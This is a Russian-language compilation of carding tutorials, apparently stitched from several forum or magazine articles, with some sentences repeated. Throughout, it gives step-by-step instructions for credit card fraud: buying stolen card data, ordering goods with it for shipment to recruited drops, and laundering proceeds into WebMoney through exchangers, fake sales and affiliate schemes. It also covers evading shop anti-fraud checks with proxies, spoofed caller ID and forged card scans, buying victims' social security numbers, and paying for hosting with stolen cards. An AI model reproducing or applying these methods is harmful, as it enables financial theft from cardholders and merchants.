Деньги с СС можно перевести на счет казино, покера, платежной системы и оттуда вывести, но это уже не будет называть заливом, это можно обозвать темой слива с СС. Так вот темы слива денег с СС никто просто так палить не будет. Есть паблик темы, о которых можно прочесть в следующих статьях, а есть приват темы, до которых нужно доходить самому. Да, темы продают, попадаются и достойные, разброс цен держится от 100$ до 3000$, во всяком случае, на глаза мне темки дороже не попадались. Только подвох в т.ч. купив тему, пускай даже через гаранта, тебе никто не даст гарантии, что тема не умрет на следующий день. Как правило темы слива живут в среднем месяц-два, далее или вовсе все накрывается, или будут вводится лимиты, дополнительные проверки, ограничения и т.п. В этом направлении можно работать и зарабатывать, но чтобы прям зарабатывать миллионы, не выйдет.
Забегая вперед, скажу, что миллионы крутятся только в банковских заливах. Кто в состоянии держать свои ботнеты, те в первую очередь выдергивают логи с банковскими аккуантами и сливают на своих дропов, а все то, что продают это шлак или небольшие балансы, или не хватает дополнительных кодов, танов, смс подтверждения, или банк не удобен для слива, долго идет транза, быстро лочат. Кстати говоря, поэтому и цены на СС столь низкие, СС идут вместе со всеми логами, деньги со счетов сливают не кислые, а СС продают сразу оптом, как дополнение к основному доходу.
Теперь спустимся на более реальную землю, заливы это хорошо, но нужен для старта капитал. А мы же хотели с нескольких десяток долларов зарабатывать на хлеб с солью, а лучше с икрой. Так вот. Есть такое волшебное место и это место вещевуха. Вбиваем стаф на дропа и получаем свой процентик. Один шоп, это по сути одна тема по сливу, если задрочить помрет также быстро. Только разница в том, что ежедневно новых шопов появляется в сотни раз больше, чем контор, которые принимают оплату. Шопов просто больше, их легче искать, не шлющий шоп без труда заменяется шлющим и так по кругу. Поиск шопа можно разделить на три этапа, первый, это отсев, подробнее можно прочить в статье ищем шоп, здесь основная задача это составить список потенциальных шлющих шопов, на втором этапе, саппортам всех этих шопов пишем легенду что я такой-то хочу отправить подарок такому-то в Россию, как мне это лучше сделать и в зависимости от тематики шопа выбираем от деда к сыну, от мужа к жене и т.д., на третьем этапе, уже по всем тем шопам, которые нам ответили положительно, пробуем вбить СС, вбиваем на небольшую сумму, дабы просто проверить шлет ли шоп вообще. Если придерживаться данной последовательности, отошлют стаф 9 из 10 шопов. Теперь посчитаем наши возможные доходы. Стафер получает в среднем 30% от цены в шопе товара. За час делается три вбива, за сутки 20, это мы берем не по верхней планке. 600$ - усредненная стоимость одного пака, если слать на дропов США или Европы, то сумма будет выше. И так. 600 умножаем на 20 вбивов и от этой суммы забираем свои 30% и получаем 3600$ дохода за одни сутки.
Слово «обналичка» вызывает разные ассоциации. У кардера с этим связано очень многое, в частности - дропы, платежные системы и, разумеется, большие деньги
.Но в итоге все сводится к одному - извлечению из виртуальных карточек вполне реальных денег. Например, WebMoney. Конечно, готовых рецептов “cc > WM” я не дам. Таких просто не существует. Многих новичков обманывают именно таким способом, потому что любого человека, только пришедшего в кардинг, будет терзать мысль: «Как же мне поскорее обналичить кредитную карту в WM и поиметь много $?»
Способ № 0 - продажа
Самый элементарный способ – продажа кредитных карточек. Его можно даже назвать примером “cс to WM”. Ты даешь кредитную карточку - тебе тут же перечисляют практические легальные деньги.
Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3. Очень небольшие деньги, если учесть, что на кредитной карте может лежать до нескольких тысяч долларов, которые ты впоследствии сможешь тратить практически как заблагорассудится. Пусть не все, но какую-то часть тебе наверняка удастся извлечь. Как? Об этом я тебе сегодня расскажу.
Способ №1 – перевод
Давай посмотрим, как осуществить перевод денег «СС > E-Gold > WM» (кредитная карта – ЭПС «E-Gold» - WebMoney). Дело в том, что E-Gold деньги ты сможешь купить прямо с кредитной карты, а их уже без проблем можно перевести на WM, обменников сейчас в Сети очень много (их список можно найти, например, на www.golddirectory.com), главное - выбрать подходящие тебе проценты. Конечно, здесь есть и сложности - у тебя могут попросить подтверждение по телефону, скан карты и документа, удостоверяющего личность. В этом случае, если ты не кардхолдер, деньги получить очень непросто.
Происходит все так. Ты ищешь на вышеуказанном сайте обменники, которые принимают кредитные карточки. Вбиваешь креду, указывая, сколько денег тебе нужно перевести с твоей карты на аккаунт в системе E-Gold. Ждешь несколько часов или, иногда, дней. Затем, если все проходит успешно - открываешь свой e-gold-аккаунт и удивляешься лежащей там сумме
. Но не все так просто, как кажется. Кардхолдер (хозяин креды) обязательно сделает чардж–реверс (возврат денег), когда увидит, что проклятый кардер нагло спер его честно заработанные деньги. Ребята из обменника отпишут в E-Gold – «помогите, нас ограбили». И твой E-Gold-аккаунт закроют вместе с деньгами. Так что очень важно успеть еще эти деньги отмыть. Есть люди, которые этим занимаются – ты шлешь им нелегальные деньги со своего аккаунта, а они отправляют тебе легальные WebMoney.Ты можешь возразить: мол, можно найти обменник E-GOLD > WM и быстренько самому обменять, чтобы не платить процент (и немалый) от ворованных денег нальщику (так зовут этого самого посредника). Но имей в виду, что вскоре этот обменник – после того, как E-Gold заберет у него деньги – свяжется еще и со службой поддержки WebMoney и потребует вернуть деньги. WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper. В общем, девиз любого кардера - “Хочешь жить, умей вертеться”.
Способ № 2 – отмыв через аукцион
Идем на интернет-аукцион www.molotok.ru и выкладываем там лот: "Домен + хостинг за XX $ в год! Оплата по WM". Потом, когда появятся покупатели, начинаем покупать по чужим кредам домены и хостинг на www.webhosting.com и продавать за XX $ покупателям с аукциона.
Казалось бы, все просто. Но через некоторое время после продажи домены и хостинги… накроются. Почему? Да все потому же - кардхолдер потребует вернуть украденные деньги, банк заберет деньги у ВорлдХостинга, который, в свою очередь, прикроет домены. Получается, что твои покупатели выбросили деньги на ветер, а ты стал кидалой. Не здорово, правда?
Способ №3 – партнерские программы
Для того чтобы осуществить этот способ, нам придется найти партнерские программы, которые платят за клики или показы баннеров. Делаем сайт, где выкладываем эти самые баннеры и скрипты спонсоров, покупаем много-много трафика на сс. И - ждем свои WM.
Тут, думаю, все шоколадно. Но контент твоего сайта должен быть солидным, чтобы не привлекать внимание службы поддержки партнерских программ. Ведь они собираются тебе платить, и если твой сайт будет представлять собой кашу из невразумительного текста и подозрительного дизайна, а счетчики будут показывать тысячи посетителей ежедневно, то это вызовет справедливые подозрения. Что может привести к закрытию твоего акка. Этому способу посвящена целая статья этого номера, поэтому я не буду останавливаться на нем подробно.
Способ №4 – Задай себе вопрос за деньги
Наш путь лежит на swapsmarts.com, в раздел «эксперт». Для реализации этого способа надо взять кучу карт без кода, создать аккаунты на этом сайте и задавать себе (как эксперту) вопросы из разных категорий. Каждый вопрос стоит определенную сумму (ее ты требуешь сам
). За 2-3 вопроса в день вполне может набежать 10-20 долларов, и так – постоянно. При выводе придется попросить выслать чек, а при обнале - попросить перевести на WM. Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.Способ №5 – Поторгуйся сам с собой
Что нам мешает покупать домены на cc и продавать их уже за WM? Существует много сайтов, где продают готовые проекты или солидные эксклюзивные шаблоны для сайтов. Их тоже можно покупать на сс и продавать через выгодную тебе платежную систему.
Торговать с самим собой можно и другим способом. К примеру, сделать РЕАЛЬНЫЙ сайт по продаже какого-нибудь сервиса или софта. Сайт должен быть именно реальный, чтобы мерчант мог это проверить и ничего не заподозрить. Затем – регистрируем аккаунт у мерчанта, ставим невысокую цену, устанавливаем все у себя на сайте. Осталось только раскрутить сайт, купить трафик за СС, и, когда у тебя наберется достаточно посещений, можно начинать покупать у самого себя, только в разумных пределах и анонимно, опять же - мерчант не должен ничего заподозрить. Таким образом можно сделать пару сайтов и потихоньку работать. Главное - не переборщить и знать меру. Потом, естественно, получить сокровенные WM, если мерчант позволяет такую услугу, или, получив чек, перевести его во все те же WM.
Способ №6 – рекламируй свои услуги
Достаточно простой, на мой взгляд, способ. Для его осуществления тебе нужно каким-то образом разрекламировать услугу: "Делаю хостинг с доменным именем для сайтов for life за n webmoney". А потом, после каждого заказа, заполнять маленькую форму на www.hostonce.com и вписывать туда свои креды. На hostonce практически не проверяют cc, и сайт никогда не закроют. А на следующий день тебе останется получить свои “честно” заработанные webmoney. Разумеется, за отлично исполненный заказ.
Способ №7 – Задорно, но не порно?
Главное здесь – найти через какой-нибудь поисковик (например, google.com) Adult-спонсоров, которые предоставляют уже готовый магазин (к примеру,www.sextoyfun.com).
Эти спонсоры дают тебе процент с продаж с твоего (точнее, предоставленного тебе) сайта и платят за привлечение рефералов. Остается только прикинуться порноманьяком - вбить карты на своем шопе. Потом, уже в роли порнопродавца, заказать чек через Western Express на WebMoney (если спонсор не работает сразу через WM).
У этого способа есть неоспоримый плюс – не надо ничего делать. Ни тебе сайтов, ни подключения к биллингам. Но есть и минус - обычно дают не больше 25% с продажи.
Заключение
Я описал далеко не все способы обналички денег с кредиток. А вот заниматься кардингом или нет - это дело лично каждого. Могу лишь посоветовать не быть назойливым, иметь терпение, читать умные книжки и, разумеется, наши статьи
.Потенциальная валидная (т.е. с лежащей на ней энной суммой денег) креда стоит в среднем $2-3.
WM с удовольствием это сделает, плюс обязательно заблокирует твой WM ID. То есть весь Keeper.
Таким образом, за виртуальное общение с самим собой вполне реально заработать до 500 долларов в месяц.
На hostonce практически не проверяют cc, и сайт никогда не закроют.
Вбив.
Скардить товар не намного сложнее, если покупать его за свои деньги. По сути скопировал данные сс, вставил в окошки и профит, ничего сложного, это так и есть, а теперь ближе к делу.
Что нужно для успешного вбива?
- Материал. СС и Дедик, дедик берем сразу под штат СС.
- Шоп. Шопы шлют ВСЕ, иначе интернет-магазинов просто бы не существовало. Отличие лишь в том, что к каждому нужен свой подход, одни не шлют в отдельные страны вовсе, другие не шлют на большие суммы, третьи не шлют, потому что сс без vbv кода и т.д.
По шагам.
1. Покупаем СС, лучше без vbv кода. На заметку: 1. Есть шопы, которые не просят vbv код, даже если СС с кодом. 2. Если вбивать электронику, то с вероятностью 98% без vbv кода вбить СС не прокатит, т.е. придется покупать только с vbv.
2. Покупаем дедик под штат СС.
3. Ищем шоп. Если есть шоп, пункт пропускаем. Хитрости поиска шопов есть в материалах.
4. Регистрируем почту. Регистрируем в зоне com, с абстрактным названием чтобы сошло для женщины и для мужчины, например, watercould98, likechokоlade и т.п.
5. Заходим на дедик.
6. Вбиваем. ну и все) Важный момент шипинг и билинг адресов. Здесь нужно экспериментировать или узнавать у саппорта шлет ли на отличный биллинг или нет. Есть шопы, в которых указываешь одинаковый билинг и шипинг адрес причем сразу дропа, данные сс не меняешь, т.е. идет соответствие адресов, но нет проверки адреса и холдера. Самые удобные шопы для вбива)
Чтобы шоп слал на одного дропа несколько раз можно менять местами имя и фамилию, делать 2-3 ошибки в имени, также указываем адрес соседа.
Любые проблемы лучше решать, написав сразу саппорту, что и почему не проходит оплата, они ответят и если повезет, за тебя сами проведут оплату.
Вещевой кардинг
Вещевой кардинг получил наибольшее распространение среди кардеров. Его суть заключается в заказе товаров в интернет-магазинах по чужим кредитным картам с целью последующего сбыта.
Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко. Чтобы получать доход, нужна цепочка людей, которые будут слаженно работать.
Как закалялась сталь
В середине 1990-х годов никто еще не слышал о махинациях с кредитными картами, а редкие случаи пропажи денег были ошибками магазинов и банков. Поэтому непуганые интернет-магазины охотно принимали несуществующие сгенерированные кредитные карты, алгоритм которых был таким же, как и у настоящих карт. Проверив алгоритм, интернет-магазины высылали заказанный товар. Обман вскрывался только в конце месяца, когда магазины запрашивали у банков перевод денег с карт на оплату товара. Естественно, что денег магазин не получал, так как запрошенных кредитных карточек просто не существовало в природе.
В это время в странах СНГ стало возможным получить доступ к интернету. Первыми пользователями были в основном преподаватели и студенты вузов. Эти студенты и составляли основу зарождающегося кардерства СНГ. Голодные студенты кардили все, что только можно, делая упор на электронику и ювелирные изделия. Особым рвением отличались украинские кардеры, которые организовали в Киеве целую сеть по транспортировке, хранению и сбыту накарженного. Десятки квартир покупались под склады для хранения электроники, которую не успевали сбывать по бросовым ценам. На таможенном терминале в киевском международном аэропорту Борисполь круглосуточно дежурили несколько грузовиков, вывозивших груз после каждого международного рейса. Таможенники, быстро оформлявшие прибывшие грузы, тоже в накладе не оставались
. Товар из европейских магазинов в основном доставлялся наземным путем. Объем товара был настолько велик, что нередко магазины отправляли свои фуры прямо на Украину, не прибегая к услугам почты. Многие магазины всерьез задумались об открытии своих филиалов в СНГ.Товар сбывался по подложным документам через оптовые и розничные магазины, которые были заинтересованы в покупке фирменной электроники по низким ценам. Огромный поток скарженной электроники привел к затовариванию украинского рынка. Сложилась парадоксальная ситуация, когда можно было купить оперативную память по цене в два раза дешевле отпускной цены производителя. Легальные поставки электроники, особенно компьютеров, практически прекратились.
Сказка не могла длиться вечно. ФСБ совместно с Интерполом уже некоторое время следили за вызывающей деятельностью кардеров. В 1996 году по Украине, России и Белоруссии прокатилась волна арестов. Главари кардерских группировок и их приближенные были арестованы. О дальнейшем существовании таких сообществ не могло быть и речи, теперь каждый был сам за себя. Товар старались сбыть сразу после получения, работали в основном поодиночке или небольшими группами, не привлекая лишних людей.
Палки в колеса
Долго такой беспредел продолжаться не мог. Из-за действий кардеров очень многие интернет-магазины разорились. Оставшиеся магазины объявили страны СНГ вне закона и перестали слать в СНГ товар. Причем даже по легальной кредитной карте заказать что-то в иностранных магазинах жителям СНГ было очень и очень трудно. В то время мой знакомый заказал в европейском интернет-магазине по своей кредитке какую-то редкую книгу. После заказа ему позвонили из магазина и попросили назвать все реквизиты его кредитной карточки. Потом попросили выслать отсканированную с двух сторон кредитку. И когда все требования магазина были выполнены, оттуда после недели раздумья пришел ответ, что по техническим причинам товар не может быть выслан. Такие пироги.
Многие думали, что это конец недолгой жизни вещевого кардинга, но выход был найден. Если они не шлют нам, то будут слать в свою страну! Теперь кардеры искали иностранца, который бы принимал товар и за вознаграждение пересылал его в СНГ либо продавал у себя на родине, высылая часть денег (а часть себе в карман). С тех пор кардеры специализируются по регионам: США, Великобритания или Европа. При этом, например, европейские магазины без проблем шлют товар в пределах Европы, в том числе и в такие близкие нам страны, как Латвия, Болгария и даже Украина.
Следующим ударом по кардерскому ремеслу стал постепенный отказ в приеме сгенерированных кред. В связи с большими убытками магазинов, у банков появились новые сервисы, позволяющие магазину проверять достоверность данных о кредитной карте на лету или в разумные сроки (раньше магазин узнавал, что его надули, уже после того, как покупка отправлялась заказчику). И теперь магазин мог отсеять несуществующую кредитку еще до отсылки товара. Но и эту преграду удалось преодолеть. Из-за несовершенства защиты интернет-магазинов можно было утянуть у них базу данных с информацией о кредитных картах клиентов, делавших у них покупки.
С этого момента многие добропорядочные американцы боялись делать покупки в интернет-магазинах. И правильно делали. Каждый магазин уверяет покупателей, что у него самая надежная защита. Но было бы намного лучше, если бы магазины просто не хранили информацию о покупателях у себя на сервере. Иногда можно, введя в поисковике что-нибудь типа "credit card name adress", выйти на список кредитных карт, который хранится на сервере интернет-магазина. То есть информация о кредитных картах в этом случае настолько незащищена, что даже индексируется поисковыми системами! Теперь, когда в магазине делали заказ по существующей карте, он снимал с нее деньги (или просто проверял ее существование, а деньги снимал в конце месяца). Через некоторое время настоящий владелец карты обращался в банк и опротестовывал транзакцию. Банк, в свою очередь, разбирался с магазином. Но поезд ушел, товар выслан, а магазин опять в дураках.
Новым шагом в защите от фрауда стал запрос магазинами кода cvv2 при покупке. Тут уж думали, что кардингу пришел конец. Фишка здесь в том, что этот код - 3 последние цифры номера на задней стороне карты, знать его может только владелец карты, который держит ее в руках. Теперь любые махинации с кредитными картами стали в принципе невозможны, так как код cvv2 узнать нельзя никак. Изначально планировалось, что cvv2 не будет сохраняться ни на какой стадии обработки кредитной карты. То есть он сообщался только банковской системе обработки карт, а уже из банка шло подтверждение или отказ. Но хотели как лучше, а получилось как всегда. Интернет-магазины, нарушая все требования банков, стали сохранять код cvv2 со всей остальной информацией о кредитных картах в своих базах данных. Ну, а базы, в свою очередь, так же спокойно, как и раньше, воровались, а кардеры получали доступ к cvv2. Все вернулось на круги своя. И пенять интернет-магазинам оставалось только на себя.
Вещевой кардинг сегодня
Сейчас вещевой кардинг переживает не лучшие времена, но и сдавать позиции не собирается. Наблюдается некое равновесие среди покупок в интернет-магазинах: с одной стороны, потери интернет-магазинов на кардерских заказах покрываются прибылью с легальных покупок, с другой стороны, этих заказов хватает кардерам, чтобы свести концы с концами и не умереть с голоду. Сегодня вещевой кардинг продолжает оставаться популярным среди новичков, хотя некоторые и разочаровываются в нем, забывая про кардинг навсегда.
Анонимность и безопасность
Главное, на что стоит обратить внимание, это безопасность и анонимность при занятии вещевым кардингом. При заказе товара в интернет-магазине специальные скрипты могут узнать дополнительную информацию о пользователе. Так, например, если ты работаешь с американскими интернет-магазинами, то и твой компьютер должен выглядеть как компьютер типичного американца. Это значит, что установленная операционная система должна быть от начала и до конца английской - магазин может насторожить даже наличие русского языка для ввода с клавиатуры. Твой часовой пояс должен быть не просто американским, а соответствовать локальному часовому поясу твоего дропа (человека, который получает товар из магазина и пересылает тебе). При заказе в интернет-магазине обязательно использование анонимного proxy-сервера. И крайне желательно, чтобы IP этого proxy-сервера соответствовал штату твоего дропа, а еще лучше городу.
Практические советы
Тебе также следует знать, что настоящий американец совершает покупки в интернет-магазине либо во время обеденного перерыва на работе, либо вечером у себя дома. Соответственно, в эти часы интернет-магазины получают больше всего заказов, и у твоего заказа будет меньше шансов привлечь внимание менеджеров магазина. Отдельно стоит упомянуть покупки подарков на Рождество и другие праздники. В этот период с виртуальных полок интернет-магазинов покупатели метут все подряд, раскупается даже самый залежалый товар. Интернет-магазинам на этот период приходится нанимать дополнительных работников. Также стоит обратить внимание на официальные выходные в той стране, на которой ты специализируешься. Заказы, сделанные в праздничные дни, будут обработаны только через несколько дней, а эта задержка может стать роковой, так как у владельца карты будет время, чтобы опротестовать платеж.
Кредитную карту для покупки в интернет-магазине следует подбирать очень тщательно. Карта должна соответствовать штату, а лучше городу твоего дропа, тогда можно попробовать указать при заказе разные адреса дропа и владельца карты и постараться убедить магазин, что ты (как владелец карты) решил сделать подарок своему племяннику на другом конце города. Если есть возможность, лучше купить карту с онлайн-доступом. В таких картах можно заходить на сайте банка в специальный раздел и менять там адрес держателя карты. Если адрес сменить на адрес дропа, то у магазина в принципе отпадут всякие сомнения в легальности покупки, так как он высылает покупку на адрес держателя карты. Но и тут все не так просто. Дело в том, что смена адреса держателя карты очень схожа с шаманством и плясками с бубном вокруг костра. Иногда адрес на карте меняется без вопросов, а иногда банк начинает сомневаться и ничего не получается. Кстати, многие кардеры очень суеверные люди
.Интернет-магазин, в котором будет сделан заказ, также надо тщательно подбирать. Не стоит делать заказ в больших интернет-магазинах с хорошей службой безопасности. Надо выбрать небольшой интернет-магазин, который обычно является лишь интернет-витриной обычного магазина. Доля покупок через интернет в таком магазине очень мала, поэтому нет квалифицированного персонала, отслеживающего покупки кардеров.
Если интернет-магазину что-то кажется подозрительным, он может потребовать выслать ему отсканированную кредитную карточку или спросит твой телефон, либо предложит тебе самому позвонить в магазин. Скан кредитной карты наши умельцы тебе за несколько десятков баксов сделают такой, что будет лучше оригинала
, а вот с телефоном придется помучиться. Можно договориться со своим дропом о подтверждении по телефону, можно найти отдельного человека. И если с дропом все просто, то отдельный человек может жить в другом штате. Тогда придется пользоваться антиАОНами, которые подменят номер телефона на тот, который будет соответствовать штату дропа.В последнее время стала очень актуальной тема по интернет-магазинам Австралии и Новой Зеландии. Из-за их отдаленности от других стран там существует лишь немногочисленный местный вещевой кардинг, который контролируется китайской мафией. Поэтому магазины без лишних вопросов шлют товар не только по своим странам, но и за границу, даже в Россию. Правда, срок доставки в Россию намного больше, чем из Америки, из-за хуже развитых служб почтовой доставки. Еще одной проблемой является добыча австралийских и новозеландских кредитных карт. Из-за того, что из этих стран мало кто кардит, очень малое количество карт можно приобрести. А если у продавца и появляются австралийские кредитки, то по ценам в несколько раз больше американских или европейских.
Ох уж эти дропы
Если магазин все-таки выслал товар, то все равно еще рано пить шампанское и праздновать победу, так как между тобой и товаром есть еще дроп. Очень часто дропов берет ФБР, а иногда сами дропы могут тебя кинуть. В найме дропа есть два пути. Первый - с самого начала все ему рассказать, чтобы он знал, на что идет. В этом случае он сможет подтверждать заказы по телефону и всячески способствовать получению товара. Либо можно найти какую-нибудь домохозяйку, которая за несколько сотен в месяц будет не прочь подработать получением и пересылкой посылок. Но у этого пути есть куча минусов. Домохозяйка, будучи существом глупым
, может делать такие вещи, которые ты себе и представить не сможешь. Например, был случай, когда на адрес такого вот дропа пришла посылка, но из-за того, что дропа несколько раз не заставали дома, посылку отправили обратно в магазин. И это при том, что время прихода почтальон каждый раз согласовывал с домохозяйкой по телефону! Но даже когда товар благополучно получен дропом и выслан тебе, радоваться все еще рано. Бывали случаи, когда дроп путал адрес, и посылка отправлялась обратно. Радоваться будешь, когда товар будет уже у тебя в руках.А как же Россия?
Многих, наверное, мучает вопрос о российских интернет-магазинах. Сам факт кардинга из российских магазинов подразумевает использование кредитной карты нашего соотечественника. Среди кардеров существует негласное правило - не трогать своих. И если на кардерских форумах проскакивает объявление о продаже базы с русскими кредитками, то оно сразу удаляется. Еще одна причина - бдящие
службы безопасности интернет-магазинов, тесно сотрудничающие с правоохранительными органами. И если, кардя товар из американских магазинов, кардер может не беспокоиться, что из-за нескольких ноутбуков его объявят в международный розыск, то ФСБ по наводке российского интернет-магазина быстро найдет мошенника.Бесконечная история
Несмотря ни на что, кардинг продолжает жить. И на каждую новую уловку магазинов найдется свое средство. Главное помнить, что все, в конечном счете, зависит от менеджера интернет-магазина, который занимается твоим заказом. Был у меня случай, когда магазин не захотел мне высылать товар, требуя телефонного звонка. Тогда я написал им жалобное письмо, что сейчас не имею доступа к телефону, а цифровой фотоаппарат предназначается моему сыну, у которого через три дня день рождения. А подарок как раз тот, о котором сын давно мечтал. Я попросил выслать покупку и пообещал, что обязательно позвоню в магазин через неделю. И это сработало! Так что никогда не стоит забывать про человеческий фактор
.Схема вещевого кардинга
Кардер, предварительно организовав свою безопасность и анонимность в Сети, делает заказ в интернет-магазине.
Магазин может попросить позвонить и/или выслать отсканированную кредитную карту. Скан кредитки рисует специальный человек. Звонок в магазин тоже делается человеком с антиАОНом, чтобы все выглядело, как будто звонит законный владелец карты.
Магазин высылает покупку твоему человеку (дропу) в стране, где находится интернет-магазин.
Дроп продает товар на месте, оставляя часть денег себе, либо пересылает товар тебе.
Кредитки с онлайн-доступом
Многие американские банки предоставляют своим клиентам доступ к информации о кредитной карте на банковском сайте. Введя на сайте номер карты и пароль, клиент может посмотреть статистику транзакций, изменить адрес и т.п. На самом деле из любой кредитной карты соответствующего банка можно сделать карту с онлайн-доступом. Для этого надо, кроме информации о кредитной карте, знать лишь номер социального страхования ее владельца, который известен только ему самому. Но в интернете можно найти людей, которые имеют доступ к базам данных с номерами социального страхования. И за 5-10 баксов они по имени владельца карты выдадут тебе номер социального страхования.
Proxy-серверы
Лучше всего proxy-серверы покупать, тогда ты сразу получаешь именно тот сервер, который тебе нужен. Но если ты начинающий кардер и денег у тебя немного, то можно взять адреса серверов на сайтах, посвященных компьютерной безопасности (www.void.ru, например). Отсортировать сервера по штатам и городам поможет программа Proxy Checker. Теперь, когда ты нашел сервер нужного тебе штата, подставь адрес и порт сервера в свой браузер.
Чтобы убедиться в своей анонимности, зайди на www.privacy.com и просмотри путь пакетов от сервера privacy.com. Последним адресом пакетов должен быть твой proxy-сервер.
Схема работы вещевика, вроде бы, лежит на поверхности. Это привлекает многих начинающих кардеров, которым все кажется понятным и простым. На самом деле заниматься вещевым кардингом не так легко.
Самый правильный хостинг
Любой кардер должен иметь ряд незаменимых вещей. Это кредитка, хороший хостинг (чтобы дурить наивных буржуев) и, конечно же, домен. Домен - это не пустой звук и предмет понтов. Именно звучное имя проекта притягивает к себе новых клиентов и вызывает уважение к его владельцу. Разумеется, чтобы не иметь никаких проблем после регистрации домена, следует уделить большое внимание двум вещам. Во-первых, названию домена, которое, как я уже сказал, имеет огромное значение. А во-вторых, грамотно выбрать хостинг, который предоставит любителю картона заветное имя второго уровня. Если первый пункт останется на совести кардера, то со вторым тебе поможет разобраться эта статья.
Сказание о хостингах
Как уже было сказано, необходимо выбрать хороший хостинг, чтобы зарегистрировать домен. Компании, предоставляющие подобные услуги, делятся на несколько видов: те, которые прописывают имя на собственном сервере и предоставляют владельцу определенные права (FTP/WEB/SSH доступ), а также дающие только зону для домена. При этом первичный и вторичный DNS-серверы должны являться собственностью клиента. Существует и третий вариант - золотая середина, хостинг, позволяющий переносить зоны на другой DNS-сервер. Таким является знаменитый www.verio.net. Об этой компании и пойдет речь в этой статье.
Вообще, альтернатив Verio очень много - тот же www.register.com. Но все они, как правило, замораживают домен при отрицательном балансе на кредитке. В случае с Верио этого не происходит - домен умирает лишь по истечении периода существования зоны. А его, как известно, можно продлить без особых проблем
. К тому же, если бабки на карте закончатся, Verio оставит клиенту не только домен, но и панель управления, где можно выполнить ряд действий: изменить зону, добавить почтовый аккаунт, выполнить апгрейд плана, посмотреть статистику и многое другое. Об этом я обязательно расскажу, но всему свое время.Регистрация - дело тонкое
Итак, ты проникся и захотел стать клиентом Verio
. Ты выбрал правильный путь, ведь если домен будет зарегистрирован с учетом следующих советов, никаких проблем не будет. Для успешной регистрации тебе понадобится рабочая (читай - с положительным балансом) кредитная карта с наличием cvv2 (специального защитного кода) и немного терпения. К слову о кредитке, совсем недавно Verio была чуть ли не единственной компанией, регистрирующей домены без cvv2-кода. Теперь все изменилось, и в форму было добавлено соответствующее поле. Но такому кардеру, как ты, достать cvv2, я думаю, будет несложно.На главной странице с правой стороны ты увидишь небольшую форму. Вводи туда желаемое имя домена и жми "Check it". Тебя перекинет на первую ступень регистрации - выбор домена. В случае если имя будет свободно, появится сообщение, иначе высветится форма для выбора альтернативного домена.
Когда имя будет определено, наступает второй шаг регистрации - выбор плана хостинга. Тебе будет предложено два варианта - купить зону только для "парковки", либо выбрать специальный план для нее. Щелкай по второму пункту и попадешь на страницу с выбором типа регистрации. Советую выбрать UNIX GOLD PLAN. Пусть он и дорогой (около $100 за месяц), но проблем с переносом зон у тебя точно не будет. Хотя сложностей не будет при любом плане, так как существует один секрет, позволяющий обманывать защиту компании. Когда действия будут подтверждены, у тебя спросят личные данные. Из них ты, конечно же, занесешь только свой e-mail, остальные сведения будут о владельце карты. Кстати, за этим адресом будет закреплен твой личный аккаунт на Verio - при вторичной регистрации домена тебе потребуется лишь ввести свой пароль и/или инфу о новой кредитке.
На предпоследнем шаге кардеру предстоит занести информацию о карте - на этом я не буду останавливаться, так как такие операции ты производишь очень часто.
Ну и, наконец, для завершения сделки, подтверди свою покупку и получи благодарность от Verio. Компания пообещает отправить тебе письмо после проверки кредитной карты. Теперь один нюанс: если ты получаешь два письма с промежутком около 10 минут - все отлично, запрос прошел, и домен забит за тобой (первое письмо содержит запрос о регистрации, второе - правила хостинга). В противном случае - карта невалидна, и придется производить новую сделку.
Через день на твой ящик придет еще одно письмо, на этот раз с данными о твоем домене. Теперь можешь прыгать от радости и ждать, пока обновятся зоны и твой домен будет откликаться на запросы
. Поначалу довольствуйся IP-адресом, за которым закреплен личный FTP-доступ и панель управления именем. В довесок к этому будут предоставлены DNS-серверы и правила пользования хостингом.Прелести Control Panel
Теперь можно проверить работу Control Panel и залогиниться под выданным аккаунтом. Панелька находится по адресу http://ip-address/stats/. Для доступа к ней выдается 6-значный логин, который является частью твоего домена (например, для www.supercard.to логин будет superc). Пароль генерируется из 8 случайно взятых символов.
Когда будешь внутри, не помешает сменить пароль на более удобный (но не менее сложный). Это делается во вкладке Change Password. Теперь самое время заняться раздачей e-mail аккаунтов. Если ты взял себе план выше, чем DNR (Domain Registration Only), то тебе будут предоставлены от десяти аккаунтов по POP3/IMAP, а также доступ к SMTP. Чтобы добавить новую POP3-запись, перейди в соответствующий раздел и задай пользователю логин и пароль. После этого жми Change, и аккаунт успешно добавится в базу.
Иногда приходится добавлять редирект-запись, то есть адрес, с которого пришедшие письма будут автоматически пересылаться на указанный в форме мыльник. С этим ничего сложного, надо лишь чуть выше отметить значение формы, названное "All email not specifically forwarded will be sent to". В случае если аккаунта не существует, все письма будут автоматически пересылаться на этот адрес. Это очень удобно и позволяет полностью контролировать почтовую систему твоего домена.
Для работы с e-mail существует приятная оболочка Webmail. Раньше она входила в любой хостинг-план на халяву, теперь же за нее просят 10 американских президентов ежемесячно (нашли, на чем нажиться
). Но стоит сказать, что скрипты Webmail сделаны на ура - в них существует все, что пригодилось бы рядовому пользователю. Ссылка на Webmail - www.supercard.to/webmail/ либо http://webmail.supercard.to/.Также присутствует интересный раздел "Domain Manager", который находится вверху на панели инструментов. Там можно без проблем зарегистрировать виртуальный домен. Он будет подвязан к главному, а оплата будет производиться по этой же карточке. Таким образом, просто заполни форму регистрации и не заботься об оплате имени - все произойдет автоматически. Кстати, процедура регистрации займет минимальное время, так как необходимо лишь поставить галочку, подтверждающую, что клиент ознакомлен с правилами хостинга, а затем аккуратно заполнить список новых имен и срок регистрации (от года до десяти лет). Если все сделано правильно и домен не занят - тебя попросят подождать денек, пока обновятся зоны. Особых проблем с созданием виртуального домена нет. Кстати, изменить, а тем более перенести зону такого виртуального имени тебе не удастся. Придется довольствоваться разделом Edit Pointers. Там возможна лишь подвязка определенного хоста к IP-адресу (создание домена третьего уровня).
Создание своих доменов
Когда ты получаешь полный доступ к зоне своего домена, то появляется возможность создания своих сабдоменов (уже третьего уровня), а также других весьма полезных полей DNS. Все это можно сделать во вкладке "Zone File Editor", которая находится в первом пункте управления "Manage My Web site".
